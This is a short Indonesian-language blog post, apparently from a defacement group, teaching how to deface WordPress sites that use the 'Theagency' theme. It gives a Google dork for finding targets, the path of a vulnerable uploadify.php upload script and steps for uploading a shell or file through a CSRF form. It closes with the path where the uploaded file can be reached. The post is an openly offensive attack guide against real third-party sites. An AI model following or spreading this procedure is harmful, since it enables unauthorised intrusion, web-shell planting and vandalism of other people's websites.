Deface Wordpress Theme Theagency

Published by Admin Monday, February 27, 2017

Haii fans :P
Kali ini gw mau share Tutorial Deface Wordpress Theme Theagency. :)

Bahan:
1. Dork.

inurl:/wp-content/themes/theagency

2. Exploit.

/wp-content/themes/theagency/includes/uploadify/uploadify.php

3. CSRF.

 Ambil disini.

Langkah - Langkah:

1. Dorking ke google.

2. Pilih salah satu site.

3. Masukin exploitnya.

4. Vuln = Blank.

5. Masukin site ke CSRF.

6. Pilih file/shell/ yg mau lu upload.

7. Kalo file sukses ke upload, bakal muncul angka '1'.

Akses file? 

/wp-content/themes/theagency/includes/uploadify/uploads/namafile 

contoh:

http://google.com/wp-content/themes/theagency/includes/uploadify/uploads/namafile

Kalo masih kurang jelas, simak video tutorial gw :

 

Okee, sekian tutorial gw kali ini, semoga bermanfaat :)

Regards, 

Berandal, [OWL SQUAD]